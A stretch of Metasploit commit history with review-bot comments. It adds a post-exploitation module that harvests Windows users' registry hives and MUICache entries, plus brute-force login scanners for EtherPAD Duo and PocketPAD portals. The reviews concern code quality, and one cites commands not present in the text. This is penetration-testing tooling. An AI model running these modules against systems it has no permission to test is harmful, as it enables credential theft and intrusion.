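Review bot: `cmd_golden_ticket_create` prints "Golden ticket written" even when `client.kiwi.golden_ticket_create` returns nil, and it creates the output file with default permissions although the file holds credential material. Guard the result and restrict the mode: `return print_error("No ticket returned") unless ticket` followed by `::File.open(target, 'wb', 0600) { |f| f.write(ticket) }`. `cmd_golden_ticket_use` likewise reads `target` with no rescue for a missing or unreadable path and reports success without looking at the response. The comment above `initialize` still says "priv command interaction" and should name Kiwi, and `get_privs` would read more easily as `if`/`else` than as `unless`/`else`.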
@@ -0,0 +1,278 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' +require 'rex/registry' + +class Metasploit3 < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Registry + + def initialize(info={}) + super(update_info(info, + 'Name' =>'Windows Gather Enum User MUICache', + 'Description' => + %q{ + This module gathers information about the files and file paths that + logged on users have executed on the system and it will also check + if the file still exists on the system in the file path it has been + previously executed. This information is gathered by using information + stored under the MUICache registry key. If the user is logged in when the + module is executed it will collect the MUICache entries by accessing + the registry directly. If the user is not logged in the module will + download users registry hive NTUSER.DAT/UsrClass.dat from the system + and the MUICache contents are parsed from the downloaded hive. + }, + 'License' => MSF_LICENSE, + 'Author' => ['TJ Glad '], + 'Platform' => ['win'], + 'SessionType' => ['meterpreter'] + )) + end + + def find_usernames() + # This function scrapes usernames, sids and homepaths from the + # registry so that we'll know what user accounts are on the system + # and where we can find those users registry hives. + usernames = Array.new + user_homedir_paths = Array.new + user_sids = Array.new + + username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" + profile_subkeys = registry_enumkeys(username_reg_path) + if profile_subkeys.blank? + print_error("Unable to access ProfileList registry key. 
Can't continue.") + return nil + else + profile_subkeys.each do |user_sid| + if user_sid.length > 10 + user_home_path = registry_getvaldata("HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList\\#{user_sid}", "ProfileImagePath") + unless user_home_path.blank? + full_path = user_home_path.delete("\00") + usernames << full_path.split("\\").last + user_homedir_paths << full_path + user_sids << user_sid + else + print_error("Unable to read ProfileImagePath from the registry. Can't continue.") + return nil + end + end + end + end + return usernames, user_homedir_paths, user_sids + end + + def enum_muicache_paths(sys_sids, mui_path) + # This function builds full registry muicache paths so that we can + # later enumerate the muicahe registry key contents. + user_mui_paths = Array.new + hive = "HKU\\" + sys_sids.each do |sid| + full_path = hive + sid + mui_path + user_mui_paths << full_path + end + return user_mui_paths + end + + def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table) + # This is the main enumeration function that calls other main + # functions depending if we can access the registry directly or if + # we need to download the hive and process it locally. + loot_path = Msf::Config::loot_directory + all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths) + all_user_entries.each do |user, reg_key, sys_path| + local_hive_copy = ::File.join(loot_path, "#{sysinfo['Computer']}_#{user}_HIVE_#{::Time.now.utc.strftime('%Y%m%d.%M%S')}") + subkeys = registry_enumvals(reg_key) + unless subkeys.blank? + # If the registry_enumvals returns us content we'll know that we + # can access the registry directly and thus continue to process + # the content collected from there. + print_status("User #{user}: Enumerating registry..") + subkeys.each do |key| + if key[0] != "@" and key != "LangID" and not key.nil? 
+ check_file_exists(key, user, table) + end + end + else + # If the registry_enumvals returns us nothing then we'll know + # that the user is most likely not logged in and we'll need to + # download and process users hive locally. + print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) + end + end + return table + end + + def check_file_exists(key, user, table) + # This function will check if it can find the program executable + # from the path it found from the registry. Permissions might affect + # if it detects the executable but it should be otherwise fairly + # reliable. + program_path = expand_path(key) + program_exists = file_exist?(key) + if program_exists == true + exists = "File found" + else + exists = "File not found" + end + table << [user, program_path, exists] + end + + def process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) + # This function will check if the filepath contains a registry hive + # and if it does it'll proceed to call the function responsible of + # downloading the hive. After successfull download it'll continue to + # call the hive_parser function which will extract the contents of + # the MUICache registry key. + user_home_path = expand_path(sys_path) + hive_path = user_home_path + hive_file + ntuser_status = client.fs.file.exists?(hive_path) + if ntuser_status == true + print_status("Downloading #{user}'s NTUSER.DAT/USERCLASS.DAT file..") + hive_status = hive_download_status(local_hive_copy, hive_path) + if hive_status == true + hive_parser(local_hive_copy, muicache, user, table) + else + print_error("All registry hive download attempts failed. Unable to continue.") + return nil + end + else + print_error("Couldn't locate/download #{user}'s registry hive. 
Can't proceed.") + return nil + end + end + + def hive_download_status(local_hive_copy, hive_path) + # This function downloads registry hives and checks for integrity + # after the transfer has completed so that we don't end up + # processing broken registry hive. + hive_status = false + 3.times do + remote_hive_hash_raw = client.fs.file.md5(hive_path) + unless remote_hive_hash_raw.blank? + remote_hive_hash = remote_hive_hash_raw.unpack('H*') + session.fs.file.download_file(local_hive_copy, hive_path) + local_hive_hash = file_local_digestmd5(local_hive_copy) + if local_hive_hash == remote_hive_hash[0] + print_good("Hive downloaded successfully.") + hive_status = true + break + else + print_error("Hive download corrupted, trying again (max 3 times)..") + File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made + hive_status = false + end + end + end + return hive_status + end + + def hive_parser(local_hive_copy, muicache, user, table) + # This function is responsible for parsing the downloaded hive and + # extracting the contents of the MUICache registry key. + print_status("Phase 3: Parsing registry content..") + err_msg = "Error parsing hive. Can't continue." + hive = Rex::Registry::Hive.new(local_hive_copy) + if hive.nil? + print_error(err_msg) + return nil + else + muicache_key = hive.relative_query(muicache) + if muicache_key.nil? + print_error(err_msg) + return nil + else + muicache_key_value_list = muicache_key.value_list + if muicache_key_value_list.nil? + print_error(err_msg) + return nil + else + muicache_key_values = muicache_key_value_list.values + if muicache_key_values.nil? + print_error(err_msg) + return nil + else + muicache_key_values.each do |value| + key = value.name + if key[0] != "@" and key != "LangID" and not key.nil? 
+ check_file_exists(key, user, table) + end + end + end + end + end + end + File.delete(local_hive_copy) # Downloaded hive gets deleted after processing + return table + end + + def print_usernames(sys_users) + # This prints usernames pulled from the paths found from the + # registry. + user_list = Array.new + sys_users.each do |user| + user_list << user + end + users = user_list.join(", ") + print_good("Found users: #{users}") + end + + def run + + # Information about the MUICache registry key was collected from: + # + # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey + # - Windows Registry Forensics / 2011 / Harlan Carvey + # - http://forensicartifacts.com/2010/08/registry-muicache/ + # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots + + print_status("Starting to enumerate MuiCache registry keys..") + sysnfo = client.sys.config.sysinfo['OS'] + if sysnfo =~/(Windows XP)/ and is_admin? + print_good("Remote system supported: #{sysnfo}") + muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache" + hive_file = "\\NTUSER.DAT" + elsif sysnfo =~/(Windows 7)/ and is_admin? + print_good("Remote system supported: #{sysnfo}") + muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" + hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" + else + print_error("Unsupported OS or not enough privileges. Unable to continue.") + return nil + end + + table = Rex::Ui::Text::Table.new( + 'Header' => 'MUICache Information', + 'Indent' => 1, + 'Columns' => + [ + "Username", + "File path", + "File status", + ]) + + print_status("Phase 1: Searching usernames..") + sys_users, sys_paths, sys_sids = find_usernames() + unless sys_users.blank? + print_usernames(sys_users) + else + print_error("Was not able to find any user accounts. 
Unable to continue.") + return nil + end + + print_status("Phase 2: Searching registry hives..") + muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) + results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table).to_s + + print_status("Phase 4: Processing results..") + loot = store_loot("muicache_info", "text/plain", session, results, nil, "MUICache Information") + print_line("\n" + results + "\n") + print_status("Results stored in: #{loot}") + print_status("Execution finished.") + end +end From 5f5ca1c0117e354088eeb3b5eed82a25c56ba8a5 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Tue, 14 Jan 2014 20:56:14 +0200 Subject: [PATCH 010/853] Minor fix based on suggestions --- modules/post/windows/gather/enum_muicache.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 273305939d..f33bc63c93 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -50,9 +50,9 @@ class Metasploit3 < Msf::Post else profile_subkeys.each do |user_sid| if user_sid.length > 10 - user_home_path = registry_getvaldata("HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList\\#{user_sid}", "ProfileImagePath") + user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") unless user_home_path.blank? - full_path = user_home_path.delete("\00") + full_path = user_home_path.strip usernames << full_path.split("\\").last user_homedir_paths << full_path user_sids << user_sid 
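Review bot: `check_file_exists` expands the registry value into `program_path` but then calls `file_exist?(key)` on the unexpanded string, so entries containing environment variables are probably reported as "File not found"; the line should be `program_exists = file_exist?(program_path)`. In `enumerate_muicache` and `hive_parser` the test `key[0] != "@" and key != "LangID" and not key.nil?` checks for nil last, after `key[0]` has already been evaluated; put it first, e.g. `next if key.nil? || key[0] == "@" || key == "LangID"`. `hive_parser` deletes the downloaded hive only on the success path, so each early `return nil` leaves a copy of the user's registry hive in the loot directory; an `ensure` around the parse would cover those paths. The timestamp format `'%Y%m%d.%M%S'` used for `local_hive_copy` has no hour field, which looks unintended.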
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post hive_path = user_home_path + hive_file ntuser_status = client.fs.file.exists?(hive_path) if ntuser_status == true - print_status("Downloading #{user}'s NTUSER.DAT/USERCLASS.DAT file..") + print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") hive_status = hive_download_status(local_hive_copy, hive_path) if hive_status == true hive_parser(local_hive_copy, muicache, user, table) @@ -232,7 +232,8 @@ class Metasploit3 < Msf::Post # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots print_status("Starting to enumerate MuiCache registry keys..") - sysnfo = client.sys.config.sysinfo['OS'] + sysnfo = sysinfo['OS'] + if sysnfo =~/(Windows XP)/ and is_admin? print_good("Remote system supported: #{sysnfo}") muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache" From 88b2e6b1c3728cb6b09fe0d1b01de53407a83a78 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:17:11 +0200 Subject: [PATCH 011/853] EtherPAD Duo Login I've run it through retab. Msfpro loads the module fine. msftidy seems broken though. Gives this on run: msftidy.rb:444: undefined (?...) sequence: /(?])/ BR --- .../auxiliary/scanner/http/ehterpadduo_login | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 modules/auxiliary/scanner/http/ehterpadduo_login diff --git a/modules/auxiliary/scanner/http/ehterpadduo_login b/modules/auxiliary/scanner/http/ehterpadduo_login new file mode 100644 index 0000000000..27bf9631c3 --- /dev/null +++ b/modules/auxiliary/scanner/http/ehterpadduo_login 
@@ -0,0 +1,104 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Description' => %{ + This module scans for EtherPAD Duo login portal, and + performs a login brute force attack to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + + )) + + end + + def run_host(ip) + unless is_app_epaduo? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the target actually isn't EtherPAD Duo + # + + def is_app_epaduo? + begin + res = send_request_cgi( + { + 'uri' => '/CGI/mParseCGI?file=mainpage.html', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) + vprint_good("#{peer} - Running EtherPAD Duo application ...") + return true + else + vprint_error("#{peer} - Application is not EtherPAD Duo. 
Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/config/configindex.ehtml', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'EtherPAD Duo Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end + + end + end From 73418a975adc221c6852e70be3599faa5ed74f4e Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:20:30 +0200 Subject: [PATCH 012/853] Rename ehterpadduo_login to ehterpadduo_login.rb --- .../scanner/http/{ehterpadduo_login => ehterpadduo_login.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{ehterpadduo_login => ehterpadduo_login.rb} (100%) diff --git a/modules/auxiliary/scanner/http/ehterpadduo_login b/modules/auxiliary/scanner/http/ehterpadduo_login.rb similarity index 100% rename from modules/auxiliary/scanner/http/ehterpadduo_login rename to modules/auxiliary/scanner/http/ehterpadduo_login.rb From 32e46c00d3652094e914c949159a6974624fc2dd Mon Sep 17 00:00:00 2001 
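Review bot: `res.headers['Server'].include?("EtherPAD")` in `is_app_epaduo?` raises NoMethodError when the response carries no Server header, because the lookup then returns nil. The same expression appears in `do_login`, and the PocketPAD module added later in this series repeats it with "Smeagol". A host that answers 200 without that header would raise out of the fingerprint check instead of being reported as not EtherPAD Duo. Coercing first avoids this: `res.headers['Server'].to_s.include?("EtherPAD")`. The header comment also reads `http//metasploit.com/download`, which is missing the colon after `http`.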
From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:21:16 +0200 Subject: [PATCH 013/853] Rename ehterpadduo_login.rb to etherpadduo_login.rb --- .../scanner/http/{ehterpadduo_login.rb => etherpadduo_login.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{ehterpadduo_login.rb => etherpadduo_login.rb} (100%) diff --git a/modules/auxiliary/scanner/http/ehterpadduo_login.rb b/modules/auxiliary/scanner/http/etherpadduo_login.rb similarity index 100% rename from modules/auxiliary/scanner/http/ehterpadduo_login.rb rename to modules/auxiliary/scanner/http/etherpadduo_login.rb From 2c0ce2dffcc78a23010c2b8ee2a656abd367a92c Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:22:52 +0200 Subject: [PATCH 014/853] PocketPAD login --- .../auxiliary/scanner/http/pocketpad_login.rb | 107 ++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 modules/auxiliary/scanner/http/pocketpad_login.rb diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb new file mode 100644 index 0000000000..a1c20290ad --- /dev/null +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb 
@@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'PocketPAD Login Brute Force Utility', + 'Description' => %{ + This module scans for PocketPAD login portal, and + performs a login brute force attack to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + + )) + + end + + def run_host(ip) + unless is_app_popaduo? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the target actually isn't PocketPAD + # + + def is_app_popaduo? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) + vprint_good("#{peer} - Running PocketPAD application ...") + return true + else + vprint_error("#{peer} - Application is not PocketPAD. 
Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/cgi-bin/config.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + 'file' => "configindex.html" + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'PocketPAD Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end + + end +end From 036ae2fd80edb5f43d2f37fbb71ff07f89e04805 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Thu, 6 Feb 2014 16:25:41 +0200 Subject: [PATCH 015/853] msftidy done --- .../scanner/http/etherpadduo_login.rb | 146 +++++++++--------- 1 file changed, 72 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/scanner/http/etherpadduo_login.rb b/modules/auxiliary/scanner/http/etherpadduo_login.rb index 27bf9631c3..42d9bcc6cb 100644 --- a/modules/auxiliary/scanner/http/etherpadduo_login.rb +++ b/modules/auxiliary/scanner/http/etherpadduo_login.rb 
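Review bot: The comment above `is_app_popaduo?` is a rhetorical question and does not say what the method checks or returns. A comment like `# Fingerprint check: true only when GET / answers 200 with a Server header containing "Smeagol" and a body containing "PocketPAD"; false on connection errors` would document it. `do_login` needs the same for its return values: `:abort` from the rescue branch, `:next_user` after a successful login, and no explicit value after a failed attempt. Since the call is the last expression in the `each_user_pass` block in `run_host`, these are what the block yields back.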
@@ -7,85 +7,84 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report - include Msf::Auxiliary::AuthBrute - include Msf::Auxiliary::Scanner +include Msf::Exploit::Remote::HttpClient +include Msf::Auxiliary::Report +include Msf::Auxiliary::AuthBrute +include Msf::Auxiliary::Scanner - def initialize(info={}) - super(update_info(info, - 'Name' => 'EtherPAD Duo Login Brute Force Utility', - 'Description' => %{ +def initialize(info={}) + super(update_info(info, + 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Description' => %{ This module scans for EtherPAD Duo login portal, and performs a login brute force attack to identify valid credentials. - }, - 'Author' => + }, + 'Author' => [ 'Karn Ganeshen ', ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE + )) - )) +end +def run_host(ip) + unless is_app_epaduo? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end +end + +# +# What's the point of running this module if the target actually isn't EtherPAD Duo +# + +def is_app_epaduo? + begin + res = send_request_cgi( + { + 'uri' => '/CGI/mParseCGI?file=mainpage.html', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) + vprint_good("#{peer} - Running EtherPAD Duo application ...") + return true + else + vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + return false end + end - def run_host(ip) - unless is_app_epaduo? 
- return - end +# +# Brute-force the login page +# - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) - end - end - - # - # What's the point of running this module if the target actually isn't EtherPAD Duo - # - - def is_app_epaduo? - begin - res = send_request_cgi( - { - 'uri' => '/CGI/mParseCGI?file=mainpage.html', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - return false - end - - if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") - return true - else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") - return false - end - end - - # - # Brute-force the login page - # - - def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/config/configindex.ehtml', - 'method' => 'GET', +def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/config/configindex.ehtml', + 'method' => 'GET', 'authorization' => basic_auth(user,pass) - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort - end + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) - print_good("#{peer} - SUCCESSFUL LOGIN - 
#{user.inspect}:#{pass.inspect}") - report_hash = { + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { :host => rhost, :port => rport, :sname => 'EtherPAD Duo Portal', @@ -93,12 +92,11 @@ class Metasploit3 < Msf::Auxiliary :pass => pass, :active => true, :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") - end - - end + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end +end +end From 4c01420f38193eff13ddb6673d72b425ee8d2442 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Thu, 6 Feb 2014 16:52:39 +0200 Subject: [PATCH 016/853] msftidy done --- .../auxiliary/scanner/http/pocketpad_login.rb | 179 +++++++++--------- 1 file changed, 88 insertions(+), 91 deletions(-) diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index a1c20290ad..2db142e4df 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb 
@@ -7,101 +7,98 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report - include Msf::Auxiliary::AuthBrute - include Msf::Auxiliary::Scanner - - def initialize(info={}) - super(update_info(info, - 'Name' => 'PocketPAD Login Brute Force Utility', - 'Description' => %{ - This module scans for PocketPAD login portal, and - performs a login brute force attack to identify valid credentials. - }, - 'Author' => - [ - 'Karn Ganeshen ', - ], - 'License' => MSF_LICENSE +include Msf::Exploit::Remote::HttpClient +include Msf::Auxiliary::Report +include Msf::Auxiliary::AuthBrute +include Msf::Auxiliary::Scanner +def initialize(info={}) + super(update_info(info, + 'Name' => 'PocketPAD Login Brute Force Utility', + 'Description' => %{ + This module scans for PocketPAD login portal, and + performs a login brute force attack to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE )) +end +def run_host(ip) + unless is_app_popad? + return end - def run_host(ip) - unless is_app_popaduo? - return - end - - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) - end - end - - # - # What's the point of running this module if the target actually isn't PocketPAD - # - - def is_app_popaduo? - begin - res = send_request_cgi( - { - 'uri' => '/', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - return false - end - - if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) - vprint_good("#{peer} - Running PocketPAD application ...") - return true - else - vprint_error("#{peer} - Application is not PocketPAD. 
Module will not continue.") - return false - end - end - - # - # Brute-force the login page - # - - def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/cgi-bin/config.cgi', - 'method' => 'POST', - 'authorization' => basic_auth(user,pass), - 'vars_post' => { - 'file' => "configindex.html" - } - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort - end - - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { - :host => rhost, - :port => rport, - :sname => 'PocketPAD Portal', - :user => user, - :pass => pass, - :active => true, - :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") - end - + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) end end + +# +# What's the point of running this module if the target actually isn't PocketPAD +# + +def is_app_popad? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + false return + end + + if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) + vprint_good("#{peer} - Running PocketPAD application ...") + return true + else + vprint_error("#{peer} - Application is not PocketPAD. 
Module will not continue.") + return false + end +end + +# +# Brute-force the login page +# + +def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/cgi-bin/config.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + 'file' => "configindex.html" + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'PocketPAD Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end +end +end From f9f2c401ca141216094be295ed52bf0986ce20b6 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 14 Feb 2014 13:12:43 -0800 Subject: [PATCH 017/853] Create myBB_GetTypeDB This exploit allows you to specify the type of database forum Mybb. Works by the operator wrongly used REGEXP. Which is not supported in postgreSQL and SQLite databases. --- modules/exploits/multi/http/myBB_GetTypeDB | 118 +++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/multi/http/myBB_GetTypeDB diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/exploits/multi/http/myBB_GetTypeDB new file mode 100644 index 0000000000..a39fd38c09 --- /dev/null +++ b/modules/exploits/multi/http/myBB_GetTypeDB 
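Review bot: The rescue branch of `is_app_popad?` now ends with `false return`, where the previous version had `return false`. With the two words swapped the line no longer returns false, and I would expect Ruby to reject it as a syntax error, in which case the module would not load at all. The line should read `return false`.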
